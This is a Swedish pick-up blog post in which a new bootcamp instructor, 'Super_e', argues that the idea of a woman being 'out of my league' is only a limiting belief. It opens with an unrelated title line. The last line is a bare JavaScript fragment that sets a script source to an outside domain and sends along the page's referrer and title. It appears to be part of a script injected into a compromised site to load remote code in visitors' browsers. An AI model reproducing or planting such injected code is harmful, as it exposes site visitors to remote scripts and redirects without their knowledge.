christy turlington 13 Hon är över min liga…

ACTION JACKSON!
Jag sitter här i GBG när jag lägger ut den här bloggen vi är inne på dag 2 av vår bootcamp här i GBG och det är lika jävla underbart att se förvandlingen hos killarna under den korta tid. Idag har jag äran att presentera våran första instruktör, jag ni läste rätt inte co-instruktör utan INSTRUKTÖR! Yes vår pojkband expanderar med ytterliggare en medlem.
Han som många andra killar har tagit vår bootcamp han är inte bara en awsome kille utan även min personliga, och CR’s vän.  Han kallas super_e på vårt forum. Ni kommer i framtiden få läsa hans bloggar.  Här kommer den första av many to come. Välkommen om bord Super_e.
 CR salutes you!

 

Hon är över min liga…
Det här är ett ämne man skulle kunna gräva ner sig hur mycket som helst i. Idag kommer vi dock bara skrapa lite på ytan.
Det här är något som jag själv har haft många funderingar kring innan jag kom i kontakt med pick up. Myten om en osynlig liga, som man av någon anledning nästan alltid låg under. Det var tankar som jag brottades med utan att riktigt förstå varför det var som det var. Idag vet jag bättre.

Första gången jag faktiskt funderade kring det, var på Mallorca för ca 9 år sedan. Jag var 17 år, och hade åkt med familjen till Alcudia för att fira min mors födelsedag. Min bror och jag brukade fördriva kvällarna på en svenskägd pub som låg i närheten. En utav kvällarna så började vi snacka med två killar i 35års åldern ifrån Malmö. Plötsligt så säger en utav dom till mig –Peka ut en tjej som jag ska ragga upp ikväll.

Jag tittade mig runt om i lokalen, och valde till slut en riktigt attraktiv tjej i 27-28års åldern. –Hon. Han tittade ngn sekund, innan han rynkade på näsan och sa- Nä. Hon är över min liga. Jag blev ärligt talat lite förvånad av hans svar. I mina ögon borde han ha kunnat ”fixa” henne. Han fortsatte sedan med att säga- Men du borde kunna fixa henne! Du ser ju bra ut, och har säkert en mycket bättre chans än jag. Det här gjorde mig ännu mer förvånad. I mina ögon så hade han en betydligt bättre chans. Han var ju mycket närmare hennes ålder än jag. Varför skulle hon vilja ha något med en 17åring att göra. Dessutom så var hon ju skitsnygg. Absolut inte min liga.

Jag förstod det inte då, men när jag nu tittar tillbaka på situationen så förstår jag vart felet låg. Först så konstaterade vi att hon var väldigt snygg, och därför kunde antagligen bara skitsnygga, coola killar få henne. Dvs inte vi. Sen antog vi båda två att den andre av oss skulle ha en bättre chans än en själv, därför han hade ju kvaliteter som man själv saknade. Summan av kardemumman- Vi antog att det vi själva hade, inte skulle räcka till. Men framför allt, placerade henne i en högre liga än vår egen.

Killar har en tendens att placera attraktiva tjejer i en liga högre än sin egen. Har någonsin ni, eller kanske en kompis motiverat att inte gå fram och prata med en attraktiv tjej, med -hon är över min liga. Man kanske inte ens uttalat det högt, utan snarare bara tänkt tanken. Varför ska jag gå fram och prata med henne för? Varför skulle hon vilja snacka med mig? Hon är ju skitsnygg ju. Hon är ju över min liga!
Det här egentligen bara begränsande tankesätt, sk ”limiting beliefs”. Därför ska jag en gång för alla klargöra något väldigt viktigt. Det finns ingen liga! Låter det klyshigt? Lugn, jag ska försöka klargöra ytterligare.

Det här med att placera tjejer i en högre liga än sin egen, är egentligen bara ett uttryck för ens egen imaginära ”otillräcklighet”. I de allra flesta fallen så delar den tilltänkta tjejen inte alls dina åsikter om att hon skulle spela i en högre liga. Hon har fullt upp med att brottas med sina egna begränsande tankesätt. Tjejer är precis lika osäkra som många killar kan vara, om inte mer. Jag ska ta ett exempel. Häromkvällen så satt jag på tunnelbanan på väg in till stan. Snett bredvid mig sitter två jättesöta tjejer i  18-20års åldern. Medans jag satt och tittade lita åt deras håll, så kom jag att tänka på att för några år sedan så hade jag antagligen ansett att de var över min liga. Det roliga var att, så fort jag gjort det, så hör jag dom säga.

Tjej1 –Alltså, jag tycker det är kul när killar kommer fram och snackar och sånt men…

Tjej2- Mmm, jag vet.

Tjej1 –Fast det kan vara svårt när dom är så där snygga eller roliga och så. Jag känner mig så underlägsen då.

Tjej2 –Aaa, typ som x, han var ju assnygg. Honom vågade jag knappt prata med.

Tjej1 –Det är typ som att man inte är i deras liga.

Jag kunde inte låta bli att småle för mig själv när jag klev av nästa station. Även om jag redan visste om den här informationen, så var det skönt att få det bekräftat ännu en gång. Tjejer är inte så speciella och märkvärdiga som vi killar gärna vill tro. Dom har sina egna bryderier. Eller som Kian(THEMAN) sa till mig en gång, ”För varje riktigt snygg tjej, så finns det minst en kille som redan tröttnat på henne”.

Återigen, det är lätt att höja attraktiva tjejer till skyarna och tro att de är i princip omöjliga att få. När de i själva verket själva går och undrar varför det inte kan komma fram en charmig kille och börja prata med dem. Nästa gång du tvekar att gå fram och inleda en konversation med en attraktiv kvinna och en tanke liknande ”hon är över min liga” ploppar upp. Fråga dig själv, vad vet jag egentligen om hennes preferenser när det kommer till killar? Inte vad du tror dig veta, utan vad du verkligen VET. I de allra flesta fallen så vet man just ingenting.

Istället har man bara skapat sig en bild i huvudet av att det man själv har att erbjuda inte räcker till. Du kanske är precis den kille hon önskat ska komma fram. Det vet du inte förrän du tagit steget och gett henne chansen att ta del av dig. Negativa tankar som dessa gör bara att man diskvalificerar sig innan man ens försökt att lyckas. Det är omöjligt att veta vad varje enskild tjej har för preferenser. Men jag kan säga er en sak som jag vet att dem inte gillar – Killar som diskvalificerar sig själva. Få den där skiten ur era huvuden en gång för alla och inse att det finns ingen liga, endast begränsande tankar. Ibland när jag har diskuterat det här med folk, så finns det alltid dom som prompt hävdar att det visst finns en liga. Ok, fine, om det nu måste göra det, så skulle jag vilja formulera det så här. Du spelar i hennes liga, och hon i din. Du kommer spela i alla tjejers liga så länge du anser dig ha rätten att göra det. Men så fort du börjar ifrågasätta din rätt att vara där, så kommer hon så småning om att känna av det.

En kille som utstrålar att han känner sig underlägsen tjejer är ingen attraktiv person. Ge dig själv därför rätten att gå fram och prata med alla attraktiva tjejer du ser. Tro mig, sannolikheten att de delar dina möjliga begränsade tankar är minimal.

Kärlek/ Super_e

 

 

 

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;